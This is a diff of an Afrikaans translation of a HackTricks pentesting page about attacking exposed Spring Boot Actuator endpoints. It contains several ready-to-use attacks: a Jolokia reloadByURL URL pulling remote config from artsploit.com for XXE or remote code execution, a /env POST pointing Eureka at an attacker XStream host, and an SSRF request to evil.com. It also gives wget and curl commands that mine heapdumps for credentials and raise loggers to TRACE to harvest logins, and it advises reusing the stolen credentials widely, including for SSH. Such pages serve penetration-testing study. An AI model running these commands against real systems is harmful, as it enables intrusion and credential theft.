Translated ['', 'src/network-services-pentesting/pentesting-web/spring-a

src/network-services-pentesting/pentesting-web/spring-actuators.md

@@ -10,26 +10,26 @@
 
 ## Exploiting Spring Boot Actuators
 
-**Check the original post from** \[**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]
+**Kyk na die oorspronklike pos by** [**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]
 
-### **Key Points:**
+### **Belangrike punte:**
 
-- Spring Boot Actuators registreer eindpunte soos `/health`, `/trace`, `/beans`, `/env`, ens. In weergawes 1 tot 1.4 is hierdie eindpunte toeganklik sonder verifikasie. Vanaf weergawe 1.5 is slegs `/health` en `/info` nie-sensitief per standaard, maar ontwikkelaars deaktiveer dikwels hierdie sekuriteit.
-- Sekere Actuator eindpunte kan sensitiewe data blootstel of skadelike aksies toelaat:
+- Spring Boot Actuators registreer endpoints soos `/health`, `/trace`, `/beans`, `/env`, ens. In weergawes 1 tot 1.4 is hierdie endpoints toeganklik sonder outentisering. Vanaf weergawe 1.5 vorentoe is slegs `/health` en `/info` standaard nie-sensitief, maar ontwikkelaars skakel hierdie sekuriteit dikwels af.
+- Sekere Actuator-endpoints kan sensitiewe data openbaar of skadelike aksies toelaat:
 - `/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart`, en `/heapdump`.
-- In Spring Boot 1.x, word actuators geregistreer onder die wortel-URL, terwyl hulle in 2.x onder die `/actuator/` basispad is.
+- In Spring Boot 1.x word actuators geregistreer onder die root URL, terwyl in 2.x hulle onder die `/actuator/` basispad is.
 
 ### **Exploitation Techniques:**
 
 1. **Remote Code Execution via '/jolokia'**:
-- Die `/jolokia` actuator eindpunt stel die Jolokia Biblioteek bloot, wat HTTP-toegang tot MBeans toelaat.
-- Die `reloadByURL` aksie kan uitgebuit word om logging konfigurasies vanaf 'n eksterne URL te herlaai, wat kan lei tot blinde XXE of Remote Code Execution via vervaardigde XML konfigurasies.
-- Voorbeeld van 'n uitbuit-URL: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
+- Die `/jolokia` actuator endpoint openbaar die Jolokia Library, wat HTTP-toegang tot MBeans toelaat.
+- Die `reloadByURL` aksie kan uitgebuit word om logging-konfigurasies vanaf 'n eksterne URL te herlaai, wat kan lei tot blind XXE of Remote Code Execution via gemanipuleerde XML-konfigurasies.
+- Voorbeeld exploit URL: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
 2. **Config Modification via '/env'**:
 
-- As Spring Cloud Biblioteke teenwoordig is, laat die `/env` eindpunt die aanpassing van omgewings eienskappe toe.
-- Eienskappe kan gemanipuleer word om kwesbaarhede uit te buit, soos die XStream deserialisering kwesbaarheid in die Eureka serviceURL.
-- Voorbeeld van 'n uitbuit POST versoek:
+- As Spring Cloud Libraries teenwoordig is, laat die `/env` endpoint die wysiging van omgewings-eienskappe toe.
+- Eienskappe kan gemanipuleer word om kwesbaarhede uit te buit, soos die XStream deserialisasie-kwetsbaarheid in die Eureka serviceURL.
+- Voorbeeld exploit POST-versoek:
 
 ```
 POST /env HTTP/1.1
@@ -41,24 +41,99 @@ eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
 ```
 
 3. **Other Useful Settings**:
-- Eienskappe soos `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url`, en `spring.datasource.tomcat.max-active` kan gemanipuleer word vir verskeie uitbuitings, soos SQL-inspuiting of die verandering van databasisverbindingstrings.
+- Eienskappe soos `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url`, en `spring.datasource.tomcat.max-active` kan gemanipuleer word vir verskeie eksploite, soos SQL injection of die verandering van database-verbindingstringe.
 
-### **Additional Information:**
+### **Bykomende inligting:**
 
-- 'n Omvattende lys van standaard actuators kan [hier](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt) gevind word.
-- Die `/env` eindpunt in Spring Boot 2.x gebruik JSON-formaat vir eiendom aanpassing, maar die algemene konsep bly dieselfde.
+- 'n Omvattende lys van standaard actuators is hier te vind [here](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt).
+- Die `/env` endpoint in Spring Boot 2.x gebruik JSON-formaat vir eienskapwysiging, maar die algemene konsep bly dieselfde.
 
-### **Related Topics:**
+### **Gekoppelde onderwerpe:**
 
 1.  **Env + H2 RCE**:
-- Besonderhede oor die uitbuiting van die kombinasie van `/env` eindpunt en H2 databasis kan [hier](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database) gevind word.
+- Besonderhede oor die uitbuiting van die kombinasie van die `/env` endpoint en die H2-databasis is hier te vind [here](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).
 
 2.  **SSRF on Spring Boot Through Incorrect Pathname Interpretation**:
-- Die hantering van matriksparameters (`;`) in HTTP-padname deur die Spring-raamwerk kan uitgebuit word vir Server-Side Request Forgery (SSRF).
-- Voorbeeld van 'n uitbuit versoek:
+- Die Spring-framework se hantering van matrix-parameters (`;`) in HTTP-padname kan uitgebuit word vir Server-Side Request Forgery (SSRF).
+- Example exploit request:
 ```http
 GET ;@evil.com/url HTTP/1.1
 Host: target.com
 Connection: close
 ```
+## HeapDump secrets mining (credentials, tokens, internal URLs)
+
+As `/actuator/heapdump` blootgestel is, kan jy gewoonlik 'n volledige JVM heap snapshot kry wat gereeld live secrets bevat (DB creds, API keys, Basic-Auth, internal service URLs, Spring property maps, ens.).
+
+- Download en vinnige triage:
+```bash
+wget http://target/actuator/heapdump -O heapdump
+# Quick wins: look for HTTP auth and JDBC
+strings -a heapdump | grep -nE 'Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client'
+# Decode any Basic credentials you find
+printf %s 'RXhhbXBsZUJhc2U2NEhlcmU=' | base64 -d
+```
+
+- Dieper analise met VisualVM en OQL:
+- Open heapdump in VisualVM, ondersoek instances van `java.lang.String` of hardloop OQL om secrets te soek:
+```
+select s.toString()
+from java.lang.String s
+where /Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client|OriginTrackedMapPropertySource/i.test(s.toString())
+```
+
+- Outomatiese ekstraksie met JDumpSpider:
+```bash
+java -jar JDumpSpider-*.jar heapdump
+```
+Tipiese hoë-waarde bevindinge:
+- Spring `DataSourceProperties` / `HikariDataSource` objekte wat `url`, `username`, `password` openbaar maak.
+- `OriginTrackedMapPropertySource` inskrywings wat `management.endpoints.web.exposure.include`, dienspoorte, en ingebedde Basic-Auth in URLs (bv., Eureka `defaultZone`) openbaar.
+- Plain HTTP versoek/antwoord fragmente insluitend `Authorization: Basic ...` vasgevang in geheue.
+
+Wenke:
+- Gebruik 'n Spring-gefokusde wordlist om actuator endpoints vinnig te ontdek (bv., SecLists spring-boot.txt) en kontroleer altyd of `/actuator/logfile`, `/actuator/httpexchanges`, `/actuator/env`, en `/actuator/configprops` ook blootgestel is.
+- Credentials van heapdump werk dikwels vir aangrensende dienste en soms vir stelselgebruikers (SSH), probeer dit dus wyd.
+
+## Misbruik van Actuator loggers/logging om credentials te vang
+
+As `management.endpoints.web.exposure.include` dit toelaat en `/actuator/loggers` blootgestel is, kan jy dinamies logvlakke verhoog na DEBUG/TRACE vir pakkette wat authentication en request processing hanteer. Gekombineer met leesbare logs (via `/actuator/logfile` of bekende logpade), kan dit credentials leak wat tydens login-vloei ingedien is (bv., Basic-Auth headers of form parameters).
+
+- Listeer en verhoog sensitiewe loggers:
+```bash
+# List available loggers
+curl -s http://target/actuator/loggers | jq .
+
+# Enable very verbose logs for security/web stacks (adjust as needed)
+curl -s -X POST http://target/actuator/loggers/org.springframework.security \
+-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
+curl -s -X POST http://target/actuator/loggers/org.springframework.web \
+-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
+curl -s -X POST http://target/actuator/loggers/org.springframework.cloud.gateway \
+-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
+```
+
+- Vind waar logs geskryf word en oes:
+```bash
+# If exposed, read from Actuator directly
+curl -s http://target/actuator/logfile | strings | grep -nE 'Authorization:|username=|password='
+
+# Otherwise, query env/config to locate file path
+curl -s http://target/actuator/env | jq '.propertySources[].properties | to_entries[] | select(.key|test("^logging\\.(file|path)"))'
+```
+
+- Roep login/authentication-verkeer op en parse die log vir creds. In microservice-opstellings met 'n gateway voor auth, maak die inskakeling van TRACE vir gateway/security pakkette dikwels headers en form bodies sigbaar. Sommige omgewings genereer selfs sintetiese login-verkeer periodiek, wat oes baie eenvoudig maak sodra logging verbose is.
+
+Notas:
+- Herstel logvlakke wanneer klaargemaak: `POST /actuator/loggers/<logger>` met `{ "configuredLevel": null }`.
+- As `/actuator/httpexchanges` blootgestel is, kan dit ook onlangse versoek-metadata oppervlakte wat sensitiewe headers kan insluit.
+
+
+## References
+
+- [Exploring Spring Boot Actuator Misconfigurations (Wiz)](https://www.wiz.io/blog/spring-boot-actuator-misconfigurations)
+- [VisualVM](https://visualvm.github.io/)
+- [JDumpSpider](https://github.com/whwlsfb/JDumpSpider)
+- [0xdf – HTB Eureka (Actuator heapdump to creds, Gateway logging abuse)](https://0xdf.gitlab.io/2025/08/30/htb-eureka.html)
+
 {{#include ../../banners/hacktricks-training.md}}